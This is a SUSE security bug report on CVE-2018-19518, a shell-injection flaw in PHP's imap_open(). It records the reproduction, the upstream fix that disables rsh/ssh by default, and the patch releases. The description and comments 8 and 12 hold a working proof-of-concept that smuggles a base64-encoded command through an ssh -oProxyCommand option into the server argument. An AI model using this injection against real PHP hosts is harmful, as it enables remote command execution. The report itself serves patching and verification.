Bug 1117107 - (CVE-2018-19518) VUL-0: CVE-2018-19518: php5,php53,php7: PHP imap_open() script injection
(CVE-2018-19518)
VUL-0: CVE-2018-19518: php5,php53,php7: PHP imap_open() script injection
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
unspecified
Other Other
: P3 - Medium : Major
: ---
Assigned To: Security Team bot
Security Team bot
https://smash.suse.de/issue/219595/
CVSSv3:SUSE:CVE-2018-19518:5.3:(AV:L/...
:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2018-11-23 08:44 UTC by Andreas Stieger
Modified: 2019-07-04 06:28 UTC (History)
2 users (show)

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Andreas Stieger 2018-11-23 08:44:08 UTC
It was reported that PHP is vulnerable to a shell injection via imap_open() and ssh. PHP installations with IMAP enabled would be affected, either via applications accepting user-supplied IMAP servers or running untrusted code, or other vectors.

PoC:

<?php
# https://antichat.com/threads/463395/#post-4254681
# echo '1234567890'>/tmp/test0001
$server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}";
imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());

References:
https://seclists.org/oss-sec/2018/q4/164
https://antichat.com/threads/463395/#post-4254681
https://github.com/Bo0oM/PHP_imap_open_exploit
Comment 1 Marcus Meissner 2018-11-23 09:37:38 UTC
QA REPRODUCER:

see comment 0
Comment 2 Marcus Meissner 2018-11-23 12:23:37 UTC
php7 on sle15 does not build the imap module apparently.
Comment 3 Marcus Meissner 2018-11-23 12:33:46 UTC
https://secure.php.net/manual/en/function.imap-open.php

 Passing untrusted data to this parameter is insecure, unless imap.enable_insecure_rsh is disabled.
Comment 4 Marcus Meissner 2018-11-23 12:35:05 UTC
I did not know this would call external shell commands and not just do imap internally :(
Comment 5 Marcus Meissner 2018-11-23 13:02:03 UTC
the above guidance seems new .. and it is quite fresh: 

imap.enable_insecure_rsh 	"0" 	PHP_INI_SYSTEM 	Available as of PHP 7.1.25, 7.2.13 and 7.3.0. Formerly, it was implicitly enabled.
Comment 6 Marcus Meissner 2018-11-23 13:04:46 UTC
I think this guidance comes from exactly this bugreport. It was added only days ago:


commit d4797f836e9bea6f0ffa1908a2ea5a3f258adc65
Author: Stanislav Malyshev <stas@php.net>
Date:   Sun Nov 18 17:10:43 2018 -0800

    Disable rsh/ssh functionality in imap by default (bug #77153)
Comment 7 Marcus Meissner 2018-11-23 13:05:30 UTC
https://bugs.php.net/bug.php?id=77153
Comment 8 Petr Gajdos 2018-11-23 14:00:43 UTC
http://git.php.net/?p=php-src.git;a=commit;h=e5bfea64c81ae34816479bb05d17cdffe45adddb

However I cannot reproduce via the testcase for 12/php7, 12/php5, 11sp3/php53 and 11/php5 with imap extension installed. What I am doing wrong?

$ cat test.php
<?php
$payload = "echo 'BUG'> " . __DIR__ . '/__bug';
$payloadb64 = base64_encode($payload);
$server = "x -oProxyCommand=echo\t$payloadb64|base64\t-d|sh}";
@imap_open('{'.$server.':143/imap}INBOX', '', '');
// clean
imap_errors();
var_dump(file_exists(__DIR__ . '/__bug'));
?>
# php test.php
bool(false)
$ ls __bug
ls: cannot access __bug: No such file or directory
$

Something else has to be set up?
Comment 9 Petr Gajdos 2018-11-23 14:55:59 UTC
Packages submitted, but completely untested.
Comment 11 Petr Gajdos 2018-11-27 07:42:43 UTC
Okay, I can reproduce it via linking rsh to ssh, cf. description of https://bugs.php.net/bug.php?id=76428
Comment 12 Petr Gajdos 2018-11-27 09:23:28 UTC
How to reproduce (just note that __DIR__ does not work for 11/php5):

install openssh, php, php-imap
link /usr/bin/ssh to /usr/bin/rsh
create test.php:
<?php
$payload = "echo 'BUG'> " . __DIR__ . '/__bug';
$payloadb64 = base64_encode($payload);
$server = "x -oProxyCommand=echo\t$payloadb64|base64\t-d|sh}";
@imap_open('{'.$server.':143/imap}INBOX', '', '');
// clean
imap_errors();
var_dump(file_exists(__DIR__ . '/__bug'));
?>

$ php test.php; rm __bug
 bool(true)
$

Even if this testcase does not work for us, I guess it is good idea to have this {r,s}sh functionality disabled by default and be able to turn on the functionality again.
Comment 13 Petr Gajdos 2018-11-27 09:25:06 UTC
AFTER

With the same setup (openssh installed, link rsh to ssh):

$ php test.php
bool(false)
$ echo 'imap.enable_insecure_rsh=1' >> /etc/php7/conf.d/imap.ini
$ php test.php; rm __bug
bool(true)
$
Comment 14 Petr Gajdos 2018-11-27 09:29:30 UTC
I think I am done here.
Comment 15 Petr Gajdos 2018-11-30 14:57:22 UTC
with exrmaketiled

#0  0x00007ffff7ab80bc in Imf_2_3::(anonymous namespace)::bufferedReadPixels (ifd=0x5555555ce280, scanLine1=-858993460, 
    scanLine2=-858993460) at ImfInputFile.cpp:331
#1  0x00007ffff7aba317 in Imf_2_3::InputFile::readPixels (this=0x5555555cdd90, scanLine1=-858993460, scanLine2=-858993460)
    at ImfInputFile.cpp:811
#2  0x00007ffff7b55edb in Imf_2_3::InputPart::readPixels (this=0x7fffffffe358, scanLine1=-858993460, scanLine2=-858993460)
    at ImfInputPart.cpp:92
#3  0x0000555555566c73 in makeTiled (inFileName=0x7fffffffeb6d "id:000131,sig:11,src:000514+002831,op:splice,rep:16", 
    outFileName=0x7fffffffeba1 "out", partnum=0, mode=Imf_2_3::ONE_LEVEL, roundingMode=Imf_2_3::ROUND_DOWN, 
    compression=Imf_2_3::ZIP_COMPRESSION, tileSizeX=64, tileSizeY=64, doNotFilter=std::set with 0 elements, extX=CLAMP, extY=CLAMP, 
    verbose=false) at makeTiled.cpp:572
#4  0x00005555555617dd in main (argc=3, argv=0x7fffffffe828) at main.cpp:421
Comment 16 Petr Gajdos 2018-12-03 09:09:18 UTC
(In reply to Petr Gajdos from comment #15)
> with exrmaketiled
> 
> #0  0x00007ffff7ab80bc in Imf_2_3::(anonymous namespace)::bufferedReadPixels
> (ifd=0x5555555ce280, scanLine1=-858993460, 
>     scanLine2=-858993460) at ImfInputFile.cpp:331
> #1  0x00007ffff7aba317 in Imf_2_3::InputFile::readPixels
> (this=0x5555555cdd90, scanLine1=-858993460, scanLine2=-858993460)
>     at ImfInputFile.cpp:811
> #2  0x00007ffff7b55edb in Imf_2_3::InputPart::readPixels
> (this=0x7fffffffe358, scanLine1=-858993460, scanLine2=-858993460)
>     at ImfInputPart.cpp:92
> #3  0x0000555555566c73 in makeTiled (inFileName=0x7fffffffeb6d
> "id:000131,sig:11,src:000514+002831,op:splice,rep:16", 
>     outFileName=0x7fffffffeba1 "out", partnum=0, mode=Imf_2_3::ONE_LEVEL,
> roundingMode=Imf_2_3::ROUND_DOWN, 
>     compression=Imf_2_3::ZIP_COMPRESSION, tileSizeX=64, tileSizeY=64,
> doNotFilter=std::set with 0 elements, extX=CLAMP, extY=CLAMP, 
>     verbose=false) at makeTiled.cpp:572
> #4  0x00005555555617dd in main (argc=3, argv=0x7fffffffe828) at main.cpp:421

ETOMANYSECURITYBUGS, this of course does not belong here.
Comment 17 Swamp Workflow Management 2018-12-05 17:11:09 UTC
SUSE-SU-2018:3986-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 1117107
CVE References: CVE-2018-19518
Sources used:
SUSE Linux Enterprise Software Development Kit 11-SP4 (src):    php53-5.3.17-112.45.1
SUSE Linux Enterprise Server 11-SP4 (src):    php53-5.3.17-112.45.1
SUSE Linux Enterprise Debuginfo 11-SP4 (src):    php53-5.3.17-112.45.1
Comment 18 Swamp Workflow Management 2018-12-05 17:13:29 UTC
SUSE-SU-2018:3988-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 1117107
CVE References: CVE-2018-19518
Sources used:
SUSE Linux Enterprise Software Development Kit 12-SP4 (src):    php7-7.0.7-50.56.2
SUSE Linux Enterprise Software Development Kit 12-SP3 (src):    php7-7.0.7-50.56.2
SUSE Linux Enterprise Module for Web Scripting 12 (src):    php7-7.0.7-50.56.2
Comment 19 Swamp Workflow Management 2018-12-06 14:10:15 UTC
SUSE-SU-2018:3995-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 1117107
CVE References: CVE-2018-19518
Sources used:
SUSE Linux Enterprise Software Development Kit 12-SP4 (src):    php5-5.5.14-109.45.2
SUSE Linux Enterprise Software Development Kit 12-SP3 (src):    php5-5.5.14-109.45.2
SUSE Linux Enterprise Module for Web Scripting 12 (src):    php5-5.5.14-109.45.2
Comment 20 Swamp Workflow Management 2018-12-07 23:11:29 UTC
openSUSE-SU-2018:4030-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 1117107
CVE References: CVE-2018-19518
Sources used:
openSUSE Leap 42.3 (src):    php7-7.0.7-52.1
Comment 21 Swamp Workflow Management 2018-12-07 23:19:33 UTC
openSUSE-SU-2018:4038-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 1117107
CVE References: CVE-2018-19518
Sources used:
openSUSE Leap 42.3 (src):    php5-5.5.14-109.1
Comment 22 Swamp Workflow Management 2018-12-11 10:30:30 UTC
An update workflow for this issue was started.
This issue was rated as important.
Please submit fixed packages until 2018-12-18.
When done, reassign the bug to security-team@suse.de.
https://swamp.suse.de/webswamp/wf/64182
Comment 27 Marcus Meissner 2019-07-04 06:28:52 UTC
released